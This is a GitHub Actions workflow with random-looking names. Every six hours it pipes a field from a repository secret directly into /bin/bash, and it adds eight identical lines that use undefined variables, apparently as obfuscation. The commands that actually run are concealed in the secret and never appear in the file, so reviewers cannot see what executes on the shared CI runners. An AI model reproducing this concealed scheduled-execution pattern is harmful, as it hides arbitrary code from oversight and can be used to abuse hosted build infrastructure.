name: duanzhixing2016

on:
  workflow_dispatch:
  schedule:
    - cron: '15 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanzhixing2016
        env:
          rappw058: ${{ secrets.rappw058 }}
        run: |
          echo $rappw058 | jq -r .gq09 | /bin/bash
          echo $aovjf44 | jq -r .ylp2605 | /bin/bash
          echo $dwqz2 | jq -r .hu2592 | /bin/bash
          echo $tv6972 | jq -r .ojoha413 | /bin/bash
          echo $opy2 | jq -r .ziu9080 | /bin/bash
          echo $lwiia67595 | jq -r .s6 | /bin/bash
          echo $dsp5231 | jq -r .ln73 | /bin/bash
          echo $sw2565 | jq -r .dmn7118 | /bin/bash
          echo $ciab2478 | jq -r .beatq2 | /bin/bash

